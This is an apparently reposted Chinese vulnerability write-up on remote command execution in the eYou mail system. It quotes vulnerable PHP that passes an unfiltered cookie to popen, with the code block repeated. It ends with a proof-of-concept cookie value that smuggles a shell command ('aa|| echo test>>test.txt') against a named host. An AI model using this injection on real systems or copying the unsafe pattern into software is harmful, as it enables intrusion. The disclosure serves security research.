eYou邮件系统远程命令执行

没穿底裤 2020年1月1日05:03:31评论630 views字数 275阅读0分55秒阅读模式
摘要

#1 漏洞代码/grad/admin/domain_logo.php
[php]

/**修改:王磊

*修改时间:2007-04-09

*修改内容:判断域LOGO的路径

*

*/

$domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤

$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令

$res = fread($fp,1024);

header('Content-type:image/rgb');

$path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo";

$fp = file($path);

foreach($fp as $key => $val){

print($val);

}

exit;

?>
[/php]
[php]
$domain = $_COOKIE['cookie'];

#1 漏洞代码

/grad/admin/domain_logo.php
[php]

/**修改:王磊

*修改时间:2007-04-09

*修改内容:判断域LOGO的路径

*

*/

$domain = $_COOKIE['cookie'];//接收cookie值,无任何过滤

$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');//直接带进了危险函数popen 执行任意命令

$res = fread($fp,1024);

header('Content-type:image/rgb');

$path = "/var/eyou/Domain/".substr($res,-5,2).$domain."/LOGO/domain_logo";

$fp = file($path);

foreach($fp as $key => $val){

print($val);

}

exit;

?>
[/php]
[php]
$domain = $_COOKIE['cookie'];

//接收cookie值,无任何过滤

$fp = popen("/var/eyou/sbin/hashid ".$domain,'r');

//直接带进了危险函数popen 可远程执行任意命令
[/php]
#2 漏洞利用

访问http://secmap.cn/grad/admin/domain_logo.php

修改cookie 值为:aa|| echo test>>test.txt 刷新 便可以在该目录下生成test.txt
eYou邮件系统远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:03:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   eYou邮件系统远程命令执行http://cn-sec.com/archives/75650.html

发表评论

匿名网友 填写信息